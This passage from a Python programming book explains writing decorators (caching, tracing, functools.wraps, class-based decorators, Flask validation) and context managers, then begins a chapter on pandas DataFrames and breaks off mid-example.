>>> get_fibo_series(10)
Call 1 of 'get_fibo_series'
…
Call 11 of 'get_fibo_series'
55
>>> get_fibo_series(7)
13

The second call in the preceding example, to find the seventh number in the series, did not execute the function even once. This is because the value of the function call for seven as the argument is already persisted in the cache.

Be mindful of the fact that unrestrained use of caching in production applications can lead to memory starvation issues.

Similar to the caching decorator that we created, Python has a predefined decorator in the functools library called lru_cache, which does the same job but also gives you an option to specify, as an argument, how large the cache should be, among other features. You can use this for the simple use cases instead of spending time defining your own.

import functools

@functools.lru_cache(maxsize=5)
def get_fibo_series(start_int):
    print(f"Getting {start_int}th value")
    if start_int < 2:
        return start_int
    return get_fibo_series(start_int - 1) + \
           get_fibo_series(start_int - 2)

The argument maxsize specifies how many calls should be stored in the lookup table. If you do not specify anything, it will store up to 128 entries by default. This is to avoid memory overflow. For no caching at all, you can pass maxsize=0 to disable the effect, while maxsize=None removes the limit entirely. Let's take a look at how this performs when executed:

>>> get_fibo_series(10)
Getting 10th value
Getting 9th value
Getting 8th value
Getting 7th value
Getting 6th value
Getting 5th value
Getting 4th value
Getting 3th value
Getting 2th value
Getting 1th value
Getting 0th value
55
>>> get_fibo_series(7)
13
>>> get_fibo_series(5)
Getting 5th value
Getting 4th value
Getting 3th value
Getting 2th value
Getting 1th value
Getting 0th value
5
>>> get_fibo_series(7)
Getting 7th value
Getting 6th value
13
>>> get_fibo_series(5)
5

>>> get_fibo_series.cache_info()
CacheInfo(hits=16, misses=19, maxsize=5, currsize=5)

The cache performance can be assessed with the help of the .cache_info() function, which can be invoked on the function decorated with lru_cache, and the cache can then be optimized if required.

Using decorators for tracing code

More often than not, you want to profile different sections of the code in production. The different scenarios where metric tracing with decorators could be helpful include the following:

Use custom logging to trace the flow of control in the function; for example, printing out the lines being executed in sequence. Track the system resource consumption in runtime; for example, the CPU cores being utilized and the memory being used.

Track the execution time of the methods, for latency monitoring or tests for performance.

Track the sequence of function calls and supplied parameters for every execution (a minimal sketch combining some of these ideas follows this list).
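The following is a minimal sketch combining two of the scenarios above – logging the supplied parameters and the execution time of each call. The decorator name trace_metrics is made up for this illustration:

import functools
import logging
import time

logger = logging.getLogger(__name__)

def trace_metrics(function):
    @functools.wraps(function)
    def wrapper(*args, **kwargs):
        # Record which function was called and with what parameters.
        logger.info("calling %s args=%r kwargs=%r",
                    function.__qualname__, args, kwargs)
        begin = time.time()
        result = function(*args, **kwargs)
        # Record how long the call took, for latency monitoring.
        logger.info("%s finished in %.4fs",
                    function.__qualname__, time.time() - begin)
        return result
    return wrapper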

Writing effective decorators

While decorators are a great feature of Python, they are not exempt from issues if used incorrectly. In this section, we will see some common issues to keep in mind or avoid for creating effective decorators, and will look at some uncommon use cases for the same.

Preserving data about the original wrapped object

An issue encountered while applying decorators would be that we do not maintain the attributes or the properties of the function that was originally wrapped. This can lead to several unintended side effects that are difficult to track. Let us take the following simple logging function to illustrate this:

# wrap_decor.py
import logging

logger = logging.getLogger(__name__)

def log_tracer(func):
    def wrapped(*args, **kwargs):
        logger.info("running %s", func.__qualname__)
        return func(*args, **kwargs)
    return wrapped

Take the following client function that applies this decorator:

@log_tracer
def data_proc(key_info):
    logger.info("processing key %s", key_info)
    …

Has something changed in the wrapped function due to the decorator? The answer, in this case, is yes. Decorators, by principle, should not be changing any aspect of the original function that they wrap. What happens here is that we have created a wrapped method in our decorator, and when it is executed, the name, docstring, and other properties reported for the original function are those of the wrapper instead.

>>> help(data_proc)
Help on function wrapped in module wrap_decor:

wrapped(*args, **kwargs)

And the renaming can also be seen in its qualified name:

>>> data_proc.__qualname__
'log_tracer.<locals>.wrapped'

Now, say that the decorator is used in several places in the code; this will create an army of wrapped methods in the code, which will create a debugging nightmare for the firm. Since the docstring of the function is overridden, if, like me, you are used to writing test cases in docstrings, then they would never be run, as the docstring has already been overridden. In order to fix this issue, all we have to do is explicitly wrap the inner function with the help of another decorator, functools.wraps:

# wrap_decor_2.py
from functools import wraps

def log_tracer(func):
    @wraps(func)
    def wrapped(*args, **kwargs):
        logger.info("running %s", func.__qualname__)
        return func(*args, **kwargs)
    return wrapped

>>> help(data_proc)
Help on function data_proc in module wrap_decor_2:

data_proc(key_info)

>>> data_proc.__qualname__
'data_proc'

Another important aspect is that now we should be able to see and run the docstring tests that we had defined. The wraps decorator, with the help of the __wrapped__ attribute, will also provide access to the underlying original function. This lesser known feature is not meant for a production application, but it definitely helps in the test suites that need to be set up around the original function.
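For instance, a test could reach past the wrapper and call the undecorated function directly (the argument value here is made up):

# __wrapped__ is set by functools.wraps and points to the original,
# undecorated data_proc, bypassing the logging wrapper entirely.
original = data_proc.__wrapped__
original("some_key")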

Apply the functools.wraps decorator to the wrapper function when creating a decorator, to avoid overriding the original function's name and metadata.

Handling decorator side-effects

Let us consider a decorator entity that was setup to log the beginning of the execution of a function, and capture how long it took the function to run:

def func_trace_wrong(method):
    logger.info("Execute method %s", method)
    exec_begin_time = time.time()

    @functools.wraps(method)
    def wrapped(*args, **kwargs):
        output = method(*args, **kwargs)
        logger.info(
            "method takes %.2fs", time.time() - exec_begin_time
        )
        return output
    return wrapped

We now apply this to a function and see what the expected output would be:

@func_trace_wrong
def slowdown(callback, time_secs=0):
    time.sleep(time_secs)
    return callback()

What was missed was a minor bug in the code. Let us see if we can figure out what the bug was by running a few statements:

>>> from decorator_module import slowdown
INFO:Execute method <function slowdown at 0x…>

Import should just be loading the module, not executing it. Hence, the log line here is an error. Let us execute the method on the terminal and see the results:

>>> main()
…
INFO:method takes 8.57s

>>> main()
…
INFO:method takes 12.98s

>>> main()
…
INFO:method takes 16.92s

Ideally, if you run the same code several times, you should see similar results. However, in this case, every subsequent run takes a little more time. Weird, right? Let us investigate further. The decorator, by definition, does the following:

slowdown = func_trace_wrong(slowdown)

Now, this is also executed when the import operation takes place. Every successive call then measures the difference from the current time to the import time, and not to the start of the run. This can be fixed simply by rearranging the code:

def func_trace(method):
    @functools.wraps(method)
    def wrapped(*args, **kwargs):
        logger.info("Execute method %s", method.__qualname__)
        exec_begin_time = time.time()
        output = method(*args, **kwargs)
        logger.info(
            "method %s takes %.2fs",
            method.__qualname__, time.time() - exec_begin_time
        )
        return output
    return wrapped

This approach resolves the issues that we discussed in this section.

Advantages of decorators with side-effects

We talked about decorators' side effects. Now, we will discuss the situations where these side effects can come in handy – say, for example, when the module needs to register objects to a public registry. Let us take the case of an event system which has a login capability for users. What if we want to make only some events available at the module level, and not all? We could design the classes in a way that only certain derived event classes are exposed. One way would be to flag every class on whether it should be exposed, but a better idea is to make use of a decorator that explicitly registers the classes that should be exposed. We define a registry dictionary that contains all the exposed user events:

EXPOSED_EVENT_SET = {}

def register_for_use(myEvent):
    EXPOSED_EVENT_SET[myEvent.__name__] = myEvent
    return myEvent

class Event:
    pass

class customEvent(Event):
    TYPE = "specificEvent"

@register_for_use
class LoginUserHandler(customEvent):
    """ Executed when user is logging in to the system """
    pass

@register_for_use
class LogoutEventHandler(customEvent):
    """ Invoked when logout operation is initiated/completed """
    pass

Whenever the module or any part of it is imported, the EXPOSED_EVENT_SET is populated, since the decorator that registers the class is invoked.

>>> from test_effects import EXPOSED_EVENT_SET
>>> EXPOSED_EVENT_SET
{'LoginUserHandler': test_effects.LoginUserHandler,
 'LogoutEventHandler': test_effects.LogoutEventHandler}

In the preceding example, you will see that the code is not very transparent, since the set of registered classes is only computed and available when the module is imported at runtime, and it is not easy to predict the values by reading through the code. However, sometimes this is needed. Most Python web framework libraries make use of this construct heavily to make sure that certain objects are available. Ideally, as we discussed, decorators should not be modifying the signature of the functions that they wrap. However, in certain situations, this anti-pattern can be used to develop a necessary feature, even though it is not Pythonic. Exercise caution.

Create decorators that work for multiple object types

Decorators are cool, we know that by now. However, sometimes decorators need to be versatile too. Sometimes, you need to use the same decorator for different types of objects in Python, be it a class, a function, or a method.

In the course of development, we have a target object in mind, and the decorators are designed to work usually with that specific type. Such decorators might not seamlessly work out of the box for other object types. For instance, when we design a decorator to work on a method, it may not be compliant with a class.

Let us talk about how we can define generic decorators. The key lies in the way in which we deal with the parameters in the signature of the decorators. If we use *args and **kwargs in the decorator definition, it makes it generic and will now work for most situations. However, sometimes this may not be flexible. Instead, we could define the wrapper function of the decorator in accordance with the signature of the initial function. Some of the reasons for this could be as follows:

It is clearer as it is similar to the original function. Taking in all generic arguments with *args and **kwargs would be difficult to use at times, since you have no idea what will be passed.

Let us discuss a case where there are several functions in the code, each take in a parameter that is used to instantiate an object. In such cases, the duplicate code for doing this may be done away with by using a decorator that will manage the parameter.

In the following example, let us assume that the DatabaseAdapter object has the logic to establish a DB connection and execute transactions. However, it needs a parameter string to establish the connection. The sample functions here will have access to the DatabaseAdapter object and will receive a string parameter. The access to the DatabaseAdapter object is common here and can be part of the decorator. The functions can still process the parameter.

import logging
from functools import wraps

# Logger instance
logger = logging.getLogger(__name__)

class DatabaseAdapter:
    def __init__(self, databaseParameters):
        self.databaseParameters = databaseParameters

    def run_query(self, query_string):
        return f"Running {query_string} with params {self.databaseParameters}"

# Define the decorator
def use_database_driver(func):
    """ Creates and returns a driver object from the param string """
    @wraps(func)
    def wrapped(databaseParameters):
        return func(DatabaseAdapter(databaseParameters))
    return wrapped

@use_database_driver
def execute_query(db_driver):
    return db_driver.run_query("some_random_function")

If we pass the connection string as a parameter to the function, an object of DatabaseAdapter class is used to execute the query and return the results:

>>> execute_query("parameter_string") It works fine in the regular method. However, let us see what happens when we use the same decorator on a class method; would that work in the same way? class HandleDBStuff: @use_database_driver def execute_db_query(self, db_driver): return db_driver.run_query(self.__class__.__name__)

When you execute the method, you will see the following output:

>>> HandleDBStuff().execute_db_query("Failing Test!")
Traceback (most recent call last):
…
TypeError: wrapped() takes 1 positional argument but 2 were given

You see the problem here? Methods defined in a class, as per their implementation, receive an additional initial parameter, self, for accessing the state of the object. Our decorator was not designed to handle this. It will try to interpret self as the databaseParameters argument and therefore fail on the second parameter. The fix for making our decorator handle both cases is to implement it as a class and use the __get__ method.

from types import MethodType
from functools import wraps

class use_database_driver:
    """ Creates and returns a driver object from the param string """

    def __init__(self, func):
        self.func = func
        wraps(self.func)(self)

    def __call__(self, connectionString):
        return self.func(DatabaseAdapter(connectionString))

    def __get__(self, obj, owner):
        if obj is None:
            return self
        return self.__class__(MethodType(self.func, obj))

The preceding decorator implementation is now simply binding the function in consideration to the object, post which the decorator is re-created with the new updated callable. If you use this on a regular function, the __get__ method will not be invoked, hence satisfying both the cases.
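Assuming that both execute_query and HandleDBStuff from the earlier listings are re-decorated with this class-based version, both call styles should now behave as expected; the return values below simply follow from run_query as defined above:

>>> execute_query("parameter_string")
'Running some_random_function with params parameter_string'

>>> HandleDBStuff().execute_db_query("parameter_string")
'Running HandleDBStuff with params parameter_string'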

Validating JSON data

Every developer has, at some point, dealt with parsing, generating, or writing JSON serialized data. My latest interaction while developing a route handler for a Flask application is as follows:

@app.route("/search", methods=["GET", "POST"]) def get_results(): json_payload = request.read_json_data() if "passkey" not in json_payload: abort(400)

# Database updation logic here return "Voila!"

In this, we are making sure that the passkey is present when the request is received. There are the following two problems here:

The get_results method may not be the right place to house the validation logic.

You might need to use the validation in some other place in the code, maybe other routes. This can be handled by creating a common decorator for the validation logic and using it wherever needed.

import functools
from flask import Flask, abort, request

app = Flask(__name__)

def json_validation(*custom_args):                      # 1
    def decor_json_validation(function):
        @functools.wraps(function)
        def json_validation_wrapper(*args, **kwargs):
            jsonObj = request.get_json()
            for custom_arg in custom_args:              # 2
                if custom_arg not in jsonObj:
                    abort(400)
            return function(*args, **kwargs)
        return json_validation_wrapper
    return decor_json_validation

The decorator defined in the preceding example takes in multiple arguments, which are the keywords to look up in the JSON request, and the validation is carried out against them. We can now configure the route handler to concentrate on the actual work of fetching the results, and rely on the fact that the JSON data has already been validated in this context.

@app.route("/search", methods=["GET", "POST"])
@json_validation("passkey")
def get_results():
    json_payload = request.get_json()
    # Database updation logic here
    return "Voila!"

Control execution rate of code

Sometimes, we face the need to control how fast or slow different sections of our code should run. There can be several use cases for when you want to make the program slow, let's say, to keep up with a queue that is feeding the data.

Let's create a decorator to handle the slowdown in its context, with an argument specifying how much the rate should be reduced:

import time
import functools

def reduce_execution_rate(_function=None, *, num_seconds=2):
    def decorator_exec_rate_reduction(function):
        @functools.wraps(function)
        def wrapper_rate_reduction(*args, **kwargs):
            time.sleep(num_seconds)
            return function(*args, **kwargs)
        return wrapper_rate_reduction

    if _function is None:
        return decorator_exec_rate_reduction
    else:
        return decorator_exec_rate_reduction(_function)

The preceding code ensures that the decorator can be used both with and without the argument. If the preceding decorator is used on a recursive function, you will see the following effect in action:

@reduce_execution_rate(num_seconds=3)
def clock_to_zero(start_integer):
    if start_integer < 1:
        print("Shoot!")
    else:
        print(start_integer)
        clock_to_zero(start_integer - 1)

As earlier, you must run the example yourself to see the effect of the decorator:

>>> clock_to_zero(5)
5
4
3
2
1
Shoot!

Decorators and the DRY principle

DRY, short for Don't Repeat Yourself, refers to the principle where functionality is bundled into constructs that can be reused across the codebase in multiple objects. Decorators are one such example of constructs that aid the DRY principle. It promotes that a certain piece of logic should be registered only once in the library or software. Once defined, a decorator will mask the core logic, thereby enabling abstraction and encapsulation, while also reducing the number of lines of code in the places where that logic is used several times.

Decorators need to adhere to the DRY principle, whether they are used with functions or classes. They do away with the need to duplicate code, especially while overriding or re-implementing certain logic in the derived classes. In a professional setup, using the DRY compliant code helps to reduce the development lifecycle time and cost, as well as make things maintainable in the long run. When the logic to these units of tasks need to be changed, only one place needs to be updated. This is the beauty of reuse.

However, you also need to ensure that effort and lines of code are actually saved when designing a decorator. Decorators add a new level of indirection to the code base, and the code thereby becomes more complex. Even though they are supposed to be treated as black boxes, sometimes people will want to walk through the code to aid understanding or debugging, so the complexity of creating the decorator should be worth it. If you are not going to use the code fragment multiple times, then it is better to avoid it and choose a simple function or a small class.

Then the question arises, how much reuse is enough reuse? Are there any guidelines or rules that can tell you when you should and should not be thinking from a reusable perspective? Sadly, there is no such specification for Python decorators. However, from popular opinion and personal experience, the rule of thumb that I follow while deciding is that if a particular component is to be used at least three times in the code, then you should consider using the reusable constructs to redefine that object.

It is three times more complex to write reusable code constructs than duplicate code. Hence, the effort to identify where it is needed is worth it.

The moral of the story is that decorators are clean, powerful, and easy to use, and are big promoters of code reuse. However, the following guiding principles have to be taken into account before diving into them:

Do not think of decorators from the beginning. Look for patterns in the design and implementation phase, and when you identify a viable task unit, go for a decorator.

Ensure that the decorator is mandated to be used in the client code (like the ones in Flask) or are used several times in the code. Only then, should you implement them.

The code in your decorators should be minimal, and should constitute only one task unit.

Separation of concerns in decorators

Decorators in Python are powerful tools that aid in the reuse of your code across a software system. One property of such code should be cohesiveness – which means that each entity should ideally perform only one task, and perform it properly. The more scoped and focussed the task is, the more reusable it makes the component. This also helps them avoid coupling and dependencies on the client code. Let us see this practice with the help of an example:

import functools
…

def func_trace(method):
    @functools.wraps(method)
    def wrapper(*args, **kwargs):
        logger.info("Method name %s executing", method.__qualname__)
        run_begin_time = time.time()
        output = method(*args, **kwargs)
        logger.info(
            "method %s takes %.2fs",
            method.__qualname__, time.time() - run_begin_time
        )
        return output
    return wrapper

In this simple example, the decorator may work fine, but it is doing more than one task – it traces the execution and computes the runtime. Therefore, if someone only wants one of these two functionalities, they would still be stuck with both of them.

Let’s see how we can break these into different smaller decorators that each define a unit level of responsibility, giving the freedom of choice to the end-user:

def exec_trace(method):
    @wraps(method)
    def myWrapper(*args, **kwargs):
        logger.info("Method name %s executing", method.__qualname__)
        return method(*args, **kwargs)
    return myWrapper

def time_profiler(method):
    @wraps(method)
    def myWrapper(*args, **kwargs):
        run_begin = time.time()
        output = method(*args, **kwargs)
        logger.info("Method %s takes %.2f",
                    method.__qualname__, time.time() - run_begin)
        return output
    return myWrapper

Now we can use both the decorators in a nested manner and achieve the same functionality as the example in the previous segment:

@time_profiler
@exec_trace
def operation():
    # Add method logic here
    …

The order in which the decorators are supplied is also important – they are executed from the inside out, from the innermost decorator to the outermost. Also, only place a single unit of task in a decorator, and use multiple decorators if needed.

An analysis of optimal decorators

Finally, let us summarize the guidelines on what makes an optimal decorator, and which popular Python libraries make heavy use of decorators. Optimal decorators should have the following traits:

Encapsulation: There has to be a clear demarcation of responsibilities between the tasks done by the decorator and the functions or methods that it is decorating. Decorators are meant to be like black boxes for their users, who should have no clue about how the logic is implemented inside. A decorator that exposes its internals to the caller is what is referred to as a leaky abstraction.

Reusability: Make the decorators generic – that way, they can be applied to several different types, rather than to only one function. If a decorator applied to only one function, you could have simply made that logic into a function rather than a decorator.

Orthogonality: You should always decouple the decorator from the object that it is being used upon, thereby making the decorator independent. If you have used Celery, you would know that decorators are heavily used in their construct, for example, a task would be defined as follows:

@app.task
def custom_task():
    …

Decorators like this are not just simple, but also very powerful. From the user's standpoint, we simply ask them to create the function definition, while converting it into a task is automatically taken care of by the decorator. Several lines of convoluted code are wrapped up in the decorator definition, and the decorated function has nothing to do with them. This ensures a logical separation between the two, which is a perfect example of encapsulation, where the functionalities are kept separate. Most web frameworks in Python, like Flask, Django, Pyramid, and so on, implement their view handlers and route definitions using decorators. An example from Flask is as follows:

@route("/", method=["POST", "GET"]) def handle_view(request): … Compared to the preceding, these decorators are providing argument-based additional functionality where the method defined in bound to a certain endpoint in the URL, and which fetch protocol (GET, POST, etc) should be used. This updates the signature of the original function to provide a simpler interface for use. These libraries of web frameworks expose their functionality to the end users with the help of decorators, and it is evident that these decorators are an excellent way of defining a clean programming interface.

Context managers

Context managers are another useful feature when it comes to writing safer Python code. You may already be using them for most trivial tasks with the built-in libraries like opening a file to read or write using the with keyword.

When you are writing the library methods or creating an API that the client will be using, context managers can help write simpler, more readable, and maintainable code.

Manage resources with context managers

We have been using the with keyword since we learnt how to open files in Python. Have we ever wondered how some objects support the use of with and some don't? Take a look at the following sample implementation, so that we can build custom classes supporting context managers using the __enter__ and __exit__ methods:

class LoadFile:
    def __init__(self, filename):
        self.filename = filename

    def __enter__(self):
        self.file_handle = open(self.filename, 'w')
        return self.file_handle

    def __exit__(self, exc_type, exc_val, exc_tb):
        if self.file_handle:
            self.file_handle.close()

with LoadFile(name) as fl:
    fl.write("Some random data")

The LoadFile class defined will now handle the file descriptor's opening and closing process for you. When the interpreter enters the with block, the __enter__ function is called. When the block is executed and the control goes out of the context, the __exit__

method implemented is called to handle the resources being released.

Some of the salient features of context managers in Python are listed as follows:

__enter__ acquires the resource and returns the object that is bound by the as clause of the with block – often self, or, as in our example, the underlying resource handle.

__exit__ is invoked on the context manager object itself, which may be different from the object returned by the __enter__ function.

__enter__ is called as soon as execution reaches the with statement, before the body of the block begins.

However, the __exit__ method will not be called if an exception is thrown in the __init__ or __enter__ functions.

Another trick to be cautious about is that if the __exit__ method is made to return True, then the block will exit gracefully and exceptions, if any, are suppressed. We now illustrate the preceding points with the help of an example of a custom context manager class:

class CustomConMan():
    def __init__(self):
        print("Initiating Object Creation")
        self.someData = 42

    def __enter__(self):
        print("Within the __enter__ block")
        return self

    def __exit__(self, data_type, data, data_traceback):
        print('Within the __exit__ block')
        if data_type:
            print(f"data_type: {data_type}")
            print(f"data: {data}")
            print(f"data_traceback: {data_traceback}")

In [3]: cntx = CustomConMan()
Initiating Object Creation

In [4]: cntx.someData
Out[4]: 42

In [5]: with cntx as cm:
   ...:     print("Within code block")
Within the __enter__ block
Within code block
Within the __exit__ block

So, that is how we create a context manager class. However, Python can also help you write context managers by using the contextlib module.

Using contextlib for creating context managers

The contextlib module in Python exposes an API in the form of a decorator called contextmanager that helps to wrap a function as a context manager. This proves to be easier than writing a whole class for it, or even implementing the __enter__ and __exit__ functions. The decorator in contextlib is a generator-based factory for a resource that can then be context managed using the with statement.

from contextlib import contextmanager

@contextmanager
def file_dump(name_of_file):
    fl_handle = open(name_of_file, "w")
    try:
        yield fl_handle
    finally:
        fl_handle.close()

In [2]: with file_dump("time_series.txt") as fl:
   ...:     fl.write("Some random data!")

The feature of the yield keyword in Python is that it returns a value when encountered, and then persists the state. When the control is returned, the code executes beyond the yield. The same thing happens here. When the file_dump method acquires the

resource, the yield gives the resource handler. When the context block is exited, the generator completes the remaining resource clean-up statement.

The @contextmanager decorator creates context managers with the yield keyword controlling the resource. It works just as well as the custom class that we created in the previous section. Personally, I find the @contextmanager decorator to be cleaner in terms of code, but the class-based implementation is more explicit and extensible.

Some practical uses of context managers

Context managers are the Pythonic way of managing resources. Let's look at where a context manager can be useful in day-to-day programming and in your projects. There are many cases where you can use a context manager to make your code better, devoid of bugs and lags.

Let us explore a couple of different scenarios which context managers are best suited for. Besides these, you can use a context manager in many different feature implementations. For that, you need to find the opportunities in your code that you think would be better when written using a context manager.

Safe database access

Usually, we interact with databases by opening a connection, executing the transactions, and then closing the connection. Whether we work on Postgres or any other database, explicitly handling the connections sometimes leaves us with buggy code and open database connections. This is where context managers come in.

The context managers ensure that when a transaction is in process for a database update, the DB remains in a locked state. In addition, the transaction remains open only for the duration of the update. An example with sqlite is as follows:

import sqlite3

connection = sqlite3.connect(":memory:")
connection.execute("create table car (id integer primary key, number varchar unique)")

with connection:
    connection.execute("insert into car(number) values (?)", ("KA-4393",))

try:
    with connection:
        connection.execute("insert into car(number) values (?)", ("KA-4393",))
except sqlite3.IntegrityError:
    print("Unable to add the same entry twice.")

The connection.commit() is automatically invoked when the context manager exits. If an exception occurs, the connection.rollback() API is automatically triggered to reset the DB to its original state. However, the exception is not suppressed – you still have to catch it explicitly.

Writing tests

While writing tests, a lot of the time you want to verify that the code throws specific kinds of exceptions, or to mock specific services. In these cases, a context manager is useful. Testing libraries like pytest have features that allow you to use a context manager to write the code that tests those exceptions or mocks the services.

import pytest

def integer_division(num1, num2):
    if not (isinstance(num1, int) and isinstance(num2, int)):
        raise ValueError("Please enter integer values!")
    try:
        return num1 / num2
    except ZeroDivisionError:
        print("Denominator should not be Zero!")
        raise

with pytest.raises(ValueError):
    integer_division("21", 7)

The mock library can also be used with context managers:

from unittest import mock

with mock.patch("my_class.my_function"):
    method_name()

The mock.patch() API is a good example of using context managers, which can also be used as a decorator!

Resource sharing in Python

The with statement can create context managers that control access to a resource. It ensures that only a single user has access to the resource at a time. Let us assume that we have a file that needs to be read by several processes. If each of these processes uses the context manager, then only one at a time can access it, locking it in the interim. You would not have to worry about the concurrency issues here.

from filelock import FileLock

def update_file_entry(statisticsFile):
    with FileLock(statisticsFile):
        # File is now locked for updation
        perform_operations()

The context manager creates a critical section for the code. While one process has entered it and is operating on this file, another process will not be able to acquire the lock, courtesy of the filelock library used here.

Remote connection protocol

Sockets are cool as a concept, but if they are not properly used, it can lead to loopholes and exposed bugs in the applications. The network level bugs are much more risky in a production setup and make the code vulnerable.

When a remote network connection to a resource is warranted, a context manager is the best bet for resource management.

import socket

class NetworkResourceAccess:
    def __init__(self, hostname, access_port):
        self.hostname = hostname
        self.access_port = access_port

    def __enter__(self):
        self._remoteMachine = socket.socket()
        self._remoteMachine.connect((self.hostname, self.access_port))
        return self

    def __exit__(self, exception, return_code, traceback):
        self._remoteMachine.close()

    def receive(self):
        return get_data_util()

    def send(self, data):
        send_data_util(data)

with NetworkResourceAccess(hostname, access_port) as netgear:
    netgear.send(['entryData1', 'entryData2'])
    output = netgear.receive()

The context manager in the preceding snippet helps to establish a connection with the remote host, and handles several different quirks seamlessly for you.

Always think of context managers if the problem deals with resource management, exception handling in tests, or database access. They make the API simpler, cleaner, and error free.

Conclusion

Hope that this was a long but interesting trail of learning. In this chapter, we covered some detailed, but essential ground about what decorators are, how to create them effectively for objects like functions, classes, or generators, and some principles and examples of writing effective decorators. Some salient lessons on Decorators that we learnt are as follows:

They are versatile and reusable in nature, thereby reducing the lines of code.

They decorate objects, and can take in arguments and return values.

Use of the @functools.wraps persists the meta-information for the original wrapped function.

Decorators can be applied to classes, generators, and can be stacked.

Stacked or nested decorators are executed from the innermost to the outermost. Decorators can also be used to persist state or cache values.

We also dug into what Context Managers are, how we define them in an optimal manner, along with some of the common and uncommon situations that warrant the use of Context Managers.

In the next chapter, we will be touching upon what the world of data science considers as useful tools, and then we will be looking into some of the best practices that are followed in the industry to optimize, speed up, automate, and refine the processing tools and data applications.

Key takeaways

Code injection into the function, class, or object can be achieved with decorators.

Using decorators, classes could be decorated with additional/external methods and attributes that operate behind the scenes. However, overdoing class decoration can make the code illegible and convoluted. With a decorator based design, the initial size of classes will be less, and they can be upgraded later with the help of decorators.

The maintainability of code is improved with decorators, since now the changes to the common or similar logic happens in one place, and there is lesser risk of missing out on changing some corner code path.

Apart from functions and classes, you can also apply decorators to the generators (using the yield from construct) or coroutines or even to already decorated objects. Decorators can also be stacked.

For creating decorators that accept parameters, the first technique is to create decorators that are a level deeper and have nested functions to introduce a novel model of indirection. Another technique would be to use a class for creating a decorator.

Decorators without parameters can be used without parentheses. Use the parentheses when you pass in parameters; otherwise, leave them out.

Singleton classes are not really used as often in Python as in other languages. The effect of a singleton is usually better implemented as a global variable in a module.

Be mindful of the fact that unrestrained use of caching in production applications can lead to memory starvation issues.

Keep in mind that decorators, by principle, should not be changing any aspect of the original function that it is wrapping.

Apply the functools.wraps decorator to the wrapper function when creating a decorator, to avoid overriding the original function's name and metadata.

It is three times more complex to write reusable code constructs than duplicate code. Hence, the effort to identify where reuse is needed is worth it. The order in which the decorators are supplied is also important – they are executed from the inside out, from the innermost decorator to the outermost. Also, only place a single unit of task in a decorator, and use multiple decorators if needed.

The contextlib module in Python exposes an API in the form of a decorator called contextmanager that helps to wrap a function as a context manager. It uses the yield keyword to control the resource. Always think of context managers if the problem deals with resource management, exception handling in tests, or database access. They make the API simpler, cleaner, and error free.

Further reading

PEP-318

Matt Harrison, Guide to: Learning Python

Dr. Graeme Cross, Meta-matters: Using decorators for better Python

CHAPTER 6 Data Processing Done Right

“Constrained optimization is the art of compromise between conflicting objectives. This is what design is all about.”

— William A. Dembski

Data science as a field has gained massive popularity in the recent years with wide adoption of digital devices and technologies. The field primarily deals with converting massive amounts of data into useful and meaningful marketing strategies. Data today may cover the scores of records generated and available from a person’s shopping patterns and choices to vehicular activity. This data is collected, transformed into a structured state, and then analysed to reach a logical, intelligent conclusion. The process of drawing value-based insights from such unstructured data in the virtual space is commonly what data analytics encompasses.

Python is now widely adopted in the field of Data Science, given its ease-of-use, availability of libraries, and widespread community reach. Having an active community of developers, it is well maintained and frequently updated. Syntactically, it is quite easy to pick up and it is geared to take on emerging areas like Natural Language Processing, Image recognition, machine learning, and data science.

Data Science mostly deals with the extrapolation of useful information from large chunks of data, which are usually unsorted and quite challenging to correlate with meaningful accuracy. Connections in disparate datasets are made with Machine Learning; however, this requires computational power and sophistication. That is where Python comes in – from reading simple CSV data sets, to producing the more complicated file outputs that are fed into ML clusters for computation.

Structure

In this chapter, we will be touching upon what the world of data science considers as useful tools, and then we will be diving into some of the best practices that are followed day to day by most data scientists to optimize, speed up, automate, and refine their processing tools and applications. Broadly, the following topics will be covered:

Dataframes and Series in Python

Idiomatic Pandas Usage & Best Practices

Speeding Up Pandas Projects

Processing CSV Data

Data cleaning with Python and Numpy

Objectives

Python offers a ton of data science libraries, Pandas being the most popular of them – an efficient, high-performance library that simplifies data analysis. No matter what scientists want out of Python, from predictive analytics to prescriptive analytics, Python packs a powerful punch with its extensive set of tools and functions. By the end of this chapter, you will be able to do the following:

Handle large datasets and complex computations in Pandas.

Improve the performance of Pandas applications.

Perform effective ETL operations in Python with Numpy and Pandas.

Generate and use random data.

Evolution of Python for data science

In the mid-90s, the Python community was working on an extension for numeric analysis to take on Matlab, called Numeric. With several improvements, Numeric later evolved into NumPy. The need of the hour was then a plotting utility, so Matlab-style plotting functionality was ported to Python as matplotlib. Next came the libraries built around scientific computing, building on top of Numpy and Matplotlib to form the SciPy package, which went on to be supported by Enthought. Python's support for array manipulations and Matlab-like plotting functionality was a major factor in its adoption over languages like Perl and Ruby.

The Pandas library will remind you of R’s plyr and reshape packages with its support for dataframes and associated functions. Similar to R’s caret package, the Scikit-learn project presents a common interface for several machine-learning algorithms. Similar to Mathematica/Sage, the “notebook” toolset concept has been implemented with IPython notebooks, which has now been improved, power-packed, and manifested in the form of the Jupyter project.

Using Pandas dataframes and series

Pandas is a game changer when it comes to analysing data with Python. It is open source, free to use under the BSD licence, high-performance, and is composed of simple data structures and tools for data analysis. The two major distinct data structures that Pandas exposes are:

DataFrames

Series

A DataFrame in Pandas is a 2-D labelled data structure that looks very similar to the tables in statistical software (think Excel or R). It is much easier to work with than dictionaries or lists handled through loops or comprehensions. Dataframes make it easier to extract, change, and analyse valuable information from datasets. We will brush up on some of the Dataframe basics and then discuss the intricacies in usage and performance of Dataframes.

DataFrames creation

Pandas DataFrames can be created by loading the datasets from persistent storage, including but not limited to Excel, CSV, or MySQL database. They can even be constructed from native Python data structures, like Lists and Dictionaries.

What if we get a dataset without any columns? Well, Pandas DataFrame can handle that and create the DataFrame by implicitly adding the Row Index and Column headers for us. For example, let’s create a DataFrame from the following list:

import pandas as pd

list_of_nums = [[1,2,3,4], [5,6,7,8], [9,10,11,12], [13,14,15,16], [17,18,19,20]]
df = pd.DataFrame(list_of_nums)

The result will look like the following:

>>> df
    0   1   2   3
0   1   2   3   4
1   5   6   7   8
2   9  10  11  12
3  13  14  15  16
4  17  18  19  20

If we do not want the Pandas DataFrame to automatically generate the Row Indices and Column names, we can pass those as arguments while creating the Dataframe:

df = pd.DataFrame(
    list_of_nums,
    index = ["1->", "2->", "3->", "4->", "5->"],
    columns = ["A", "B", "C", "D"]
)

The following is how it will look:

In [6]: df
Out[6]:
      A   B   C   D
1->   1   2   3   4
2->   5   6   7   8
3->   9  10  11  12
4->  13  14  15  16
5->  17  18  19  20

It should be noted that we could also create a Pandas DataFrame from NumPy arrays as the following:

import numpy as np

